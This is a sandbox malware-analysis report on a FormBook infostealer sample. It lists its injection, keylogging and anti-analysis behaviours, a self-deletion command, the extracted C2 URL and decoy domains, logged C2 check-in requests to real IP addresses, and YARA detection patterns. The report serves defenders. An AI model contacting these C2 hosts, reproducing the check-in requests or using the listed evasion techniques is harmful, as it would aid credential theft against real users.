Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579888
MD5:b96e6785937bd52b1281fb98f0abcf25
SHA1:d27572ada589769bfdb99dabbd485556e39010ba
SHA256:519678c24f6036d935bdd915090f07ad1fea068dc2491861648c6b00698de514
Tags:exeuser-jstrosch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B96E6785937BD52B1281FB98F0ABCF25)
    • svchost.exe (PID: 5020 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 1188 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • wlanext.exe (PID: 2924 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 2700 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • explorer.exe (PID: 3052 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 5716 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries
      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.2490000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.2490000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.2490000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.svchost.exe.2490000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.svchost.exe.2490000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 10 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5324, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\Desktop\file.exe", ProcessId: 5020, ProcessName: svchost.exe
          Source: Process startedAuthor: Tim Rauch: Data: Command: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 2924, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", ProcessId: 2700, ProcessName: cmd.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5324, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\Desktop\file.exe", ProcessId: 5020, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-23T13:58:16.204199+010020314531Malware Command and Control Activity Detected192.168.2.44977245.38.60.4780TCP
          2024-12-23T13:58:37.356933+010020314531Malware Command and Control Activity Detected192.168.2.449819198.252.111.4980TCP
          2024-12-23T13:59:00.358258+010020314531Malware Command and Control Activity Detected192.168.2.449885104.21.40.19680TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
          Source: file.exeReversingLabs: Detection: 31%
          Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F06CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F06CA9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F060DD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F063F9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F0EB60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F0F5FA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F56F FindFirstFileW,FindClose,0_2_00F0F56F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F11B2F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F11C8A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F11F94
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi1_2_024A7D7F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi4_2_00AB7D7F

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49819 -> 198.252.111.49:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49819 -> 198.252.111.49:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49772 -> 45.38.60.47:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49772 -> 45.38.60.47:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49772 -> 45.38.60.47:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49819 -> 198.252.111.49:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49885 -> 104.21.40.196:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49885 -> 104.21.40.196:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49885 -> 104.21.40.196:80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.38.60.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.40.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.252.111.49 80Jump to behavior
          Source: Malware configuration extractorURLs: www.7b5846.online/hwu6/
          Source: global trafficHTTP traffic detected: GET /hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn HTTP/1.1Host: www.vytech.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?NvW8gh=ODu4ekR727XBQcKUwHIo8nVNut1O1Z6HvIEUsjxvVtHRsmxVrOVq8qUINChS6+VnMtr8&1bd=qBZpwRT8rpbTOZn HTTP/1.1Host: www.lebahsemesta57.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps HTTP/1.1Host: www.7b5846.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 104.21.40.196 104.21.40.196
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F14EB5
          Source: global trafficHTTP traffic detected: GET /hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn HTTP/1.1Host: www.vytech.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?NvW8gh=ODu4ekR727XBQcKUwHIo8nVNut1O1Z6HvIEUsjxvVtHRsmxVrOVq8qUINChS6+VnMtr8&1bd=qBZpwRT8rpbTOZn HTTP/1.1Host: www.lebahsemesta57.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps HTTP/1.1Host: www.7b5846.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.imxtld.club
          Source: global trafficDNS traffic detected: DNS query: www.ux-design-courses-53497.bond
          Source: global trafficDNS traffic detected: DNS query: www.vytech.net
          Source: global trafficDNS traffic detected: DNS query: www.lebahsemesta57.click
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: www.7b5846.online
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
